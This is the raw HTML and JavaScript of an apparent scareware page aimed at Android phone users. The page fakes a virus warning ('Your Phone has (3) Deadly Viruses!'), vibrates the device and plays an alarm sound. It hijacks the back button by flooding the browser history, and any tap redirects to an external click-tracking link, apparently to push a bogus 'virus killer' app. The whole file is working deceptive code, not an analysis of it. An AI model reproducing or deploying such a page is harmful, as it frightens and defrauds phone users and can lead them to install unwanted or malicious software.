<!--
en
DATE_TIME: 2017-10-25T00:45:22+00:00
IP: 37.142.219.104
--><!DOCTYPE html><html><head>
  <base href="">

  <base href="">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
            <title>Android WARNING</title>
            <meta name="viewport" content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0, width=device-width">
            <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="referrer" content="no-referrer">

        
    
    
    <script type="text/javascript">
        ! function () {
            var t;
            try {
                for (t = 0; 10 > t; ++t) history.pushState({}, "", window.location.href.split(window.location.hash||"#")[0]+"#");
                window.addEventListener('popstate', function() {
                    t.state && location.replace(window.location.href.split(window.location.hash||"#")[0]+"#")
                });
            } catch (o) {}
        }();
    
        function load(){
            navigator.vibrate = navigator.vibrate ||
            navigator.webkitVibrate ||
            navigator.mozVibrate ||
            navigator.msVibrate;
            navigator.vibrate([1000, 500, 1000, 500, 1000, 500]);
            setTimeout(function(){showAlert();},2000);
        }


        function launchpopLink(event){
                        try{
                event = event || window.event;
                if (event.preventDefault) {
                    event.preventDefault();
                    event.stopPropagation();
                } else {
                    event.cancelBubble = true;
                    event.returnValue = false;
                }
            } catch (o) {}

            window.location.replace("http://t.exclusivedealsonly.com/click");
            return false;
        }

        function showAlert(){
            alert("WARNING! Your Phone has (3) Deadly Viruses!\n\nThe Viruses may corrupt your data.\n\nPlease follow the instructions to remove the Viruses.");
        }
    </script>
    </head>

	<body onload="load()" style="margin: 0px; padding: 0px;" class="fullPage" onclick="launchpopLink(event);">
		<audio id="music" autoplay="autoplay">
		<source src="http://trusted-fix.com/index2/redrobot/alert.mp3" type="audio/mpeg">
		<source src="http://trusted-fix.com/index2/redrobot/alert.ogg" type="audio/ogg"> 
		</audio>
		<img src="6-stripes.png" width="100%">
		<center>
			<h3 style="color:white;font-size:35px;display:block;margin-left:auto;margin-right:auto;margin-top:12px;margin-bottom:12px" id="NO1">Your Phone has (3) Deadly Viruses!</h3>
		</center>
		<div style="width: 162px;margin: 0 auto;"><img width="152px" id="image1" src="icon.gif"></div>
		<center>
			<p style="width:90%;font-size:17px;" id="NO2">Threat from:</p>
			<p style="width:90%;font-size:17px;color:#FFA000;" id="NO3">Backdoor.AndroidOS.Obad.a</p>
		</center>
		<div align="center" style="padding-bottom:10px;color:orange">
			<span class="button" onclick="launchpopLink(event);" id="NO4">Remove Viruses</span>
		</div>
		<center>
			<p style="width:90%;font-size:15px" id="NO5">Step 1. Download and install virus killer.</p>
		</center>
		<center>
			<p style="width:90%;font-size:15px" id="NO6">Step 2. Open the App and kill the viruses.</p>
		</center>


		<img src="6-stripes.png" width="100%">

<style>
body {
    background: none repeat scroll 0 0 #181818;
    color: #fff;
    font-family: Tahoma;
    padding-top: 5px;
}

body > .panel {
    background: none repeat scroll 0 0 #424542;
    border: 3px solid #fff;
    color: #fff;
    margin: 0 auto;
    width: 95%;
     -moz-box-sizing: border-box;
    padding: 10px;
}

body > .panel > h2 {
    color: #FFFFFF;
    font-size: 20px;
    font-weight: normal;
    margin: -10px -10px 10px;
    padding: 12px 0 12px 50px;
    text-shadow: none;
}

body.fullPage{
	cursor:hand;
}

.button{
    
    border: 1px solid #524D52;
    color: #FFFFFF;
    padding: 10px;
    text-align: center;
    text-decoration: none;
    width: 250px;
    
border:1px solid #34740e;
 -webkit-border-radius: 8px;
 -moz-border-radius: 8px;
 border-radius: 8px;
 font-size:20px;
 font-family:arial, helvetica, sans-serif; 
 padding: 10px 10px 10px 10px; 
 text-decoration:none; 
 text-shadow: -1px -1px 0 rgba(0,0,0,0.3);
 font-weight:bold;
  color: #FFFFFF;
 background-color: #4ba614;
  background-image: -webkit-gradient(linear, left top, left bottom, from(#4ba614), to(#008c00));
 background-image: -webkit-linear-gradient(top, #4ba614, #008c00);
 background-image: -moz-linear-gradient(top, #4ba614, #008c00);
 background-image: -ms-linear-gradient(top, #4ba614, #008c00);
 background-image: -o-linear-gradient(top, #4ba614, #008c00);
 background-image: linear-gradient(to bottom, #4ba614, #008c00);filter:progid:DXImageTransform.Microsoft.gradient(GradientType=0,startColorstr=#4ba614, endColorstr=#008c00);
}

.button:hover{
 border:1px solid #224b09;
 background-color: #36780f; background-image: -webkit-gradient(linear, left top, left bottom, from(#36780f), to(#005900));
 background-image: -webkit-linear-gradient(top, #36780f, #005900);
 background-image: -moz-linear-gradient(top, #36780f, #005900);
 background-image: -ms-linear-gradient(top, #36780f, #005900);
 background-image: -o-linear-gradient(top, #36780f, #005900);
 background-image: linear-gradient(to bottom, #36780f, #005900);filter:progid:DXImageTransform.Microsoft.gradient(GradientType=0,startColorstr=#36780f, endColorstr=#005900);
}
.tb_button {padding:1px;cursor:pointer;border-right: 1px solid #8b8b8b;border-left: 1px solid #FFF;border-bottom: 1px solid #fff;}.tb_button.hover {borer:2px outset #def; background-color: #f8f8f8 !important;}.ws_toolbar {z-index:100000} .ws_toolbar .ws_tb_btn {cursor:pointer;border:1px solid #555;padding:3px}   .tb_highlight{background-color:yellow} .tb_hide {visibility:hidden} .ws_toolbar img {padding:2px;margin:0px}
</style>




</body></html>